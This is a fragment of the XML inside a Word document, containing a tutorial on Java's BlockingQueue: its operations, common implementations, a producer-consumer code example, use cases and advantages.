      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>empty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a thread attempting to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> an element will be blocked until there is an element available in the queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF8B22E" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D85F85" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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BlockingQueue is thread-safe, meaning multiple threads can safely put and take elements from the queue simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD55A7A" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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airness</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FCE4B8" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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ome implementations of BlockingQueue can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fair</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using FIFO order for thread access) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unfair</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (where threads may not access the queue in a predictable order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDF3DFC" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="0049451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perations in BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0559CFE8"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BlockingQueue supports the following operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6189A55C" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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t()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inserts an element into the queue. If the queue is full, the thread will block until space becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7899AF75" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ake()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes and returns an element from the queue. If the queue is empty, the thread will block until an element is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED1111" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ffer()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Attempts to insert an element into the queue without blocking. If the queue is full, it returns false instead of blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B492DE" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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oll()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Attempts to remove an element from the queue without blocking. If the queue is empty, it returns null instead of blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31731263" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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eek()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retrieves the head of the queue without removing it. It doesn't block but returns null if the queue is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26951B3C" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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mainingCapacity()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns the number of remaining spaces in the queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41429A46" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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rainTo()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes all the elements from the queue and places them in a given collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3325423A" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="0049451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mon Implementations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376A79E5" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A bounded blocking queue backed by an array. The size is fixed when it is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD32355" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A blocking queue backed by a linked node structure. It can have an optional capacity, or if not specified, it is virtually unbounded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FF1EE3" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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iorityBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A blocking queue that orders elements according to their natural ordering or by a specified comparator. Unlike other blocking queues, it does not have a capacity limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3650CE58" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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layQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A specialized implementation of a blocking queue where each element has a delay associated with it. Elements cannot be taken until their delay has expired.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5508E4AD" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="0049451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Usage (Producer-Consumer Problem):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5139B177"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concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D59FC4C" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7030AFD2"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Producer implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5FEAE"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final BlockingQueue&lt;Integer&gt; queue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A982890" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A58DD80"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Producer(BlockingQueue&lt;Integer&gt; queue) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E365264"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queue = queue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75038677"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34A6FA7" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79AA2D36"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10955EC4"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run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D613947"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DF3BDA"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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0007D29F"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eger value = (int) (Math.random() * 100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4727C89F"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Produced: " + value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4851B4"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queue.put(value); // Blocks if the queue is full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D735AFA"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read.sleep(1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D761AF0"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6F4352B"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tch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A86D25"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read.currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356FD299"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DEF0D3B"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6DB409C"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44A9901" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CDCB0C7"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Consumer implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49768DF8"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final BlockingQueue&lt;Integer&gt; queue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64314E77" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="529C103C"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Consumer(BlockingQueue&lt;Integer&gt; queue) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4827A1F1"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queue = queue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337C73B7"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870132A" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9C0A60"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1346CFBB"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run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9BFE05"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616CCB6C"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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C4E49F"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eger value = queue.take(); // Blocks if the queue is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D83814E"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onsumed: " + value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09044323"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read.sleep(1500);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0390593B"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3BBD2CC"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tch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6792B5F2"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read.currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025AFCF4"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7A6CFAA"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579A159"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62FB62A" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6C3323"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BlockingQueueExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F2A34D"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7B6F95CA"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BlockingQueue&lt;Integer&gt; queue = new ArrayBlockingQueue&lt;&gt;(10); // A bounded queue with capacity 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D257E7" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A82F396"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read producerThread = new Thread(new Producer(queue));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC7A3F3"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read consumerThread = new Thread(new Consumer(queue));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E985AE" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36BA4D56"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oducerThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2435B004"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nsumerThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAE3FC7"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9D18338" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="004945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5A3D197" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="0049451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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AC43F3" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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this example, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> adds random integers to the BlockingQueue, and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> takes integers from the queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B7C707" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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queue is full, the producer thread will block until there is space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5B13DC" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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queue is empty, the consumer thread will block until there is something to consume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D15C13B" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="0049451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Use Cases of BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A2B3E7" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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oducer-Consumer Problem</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Where multiple producers generate data and multiple consumers process the data. The BlockingQueue ensures that producers block when the queue is full and consumers block when the queue is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC529F" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ask Scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Threads can submit tasks to a BlockingQueue, and worker threads can take and process these tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A9652" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ource Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you have a fixed pool of resources and want threads to wait for a resource to become available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B45ABAB" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="0049451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dvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD79DE7" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90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Safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Automatically handles synchronization between threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD19E81" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90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Blocking Nature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Blocks threads instead of busy-waiting, leading to more efficient resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA90CE" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90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implifies Concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ideal for scenarios where you need coordination between producer and consumer threads without manually handling synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B593AC" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00442310">
      <w:pPr>
        <w:rPr>
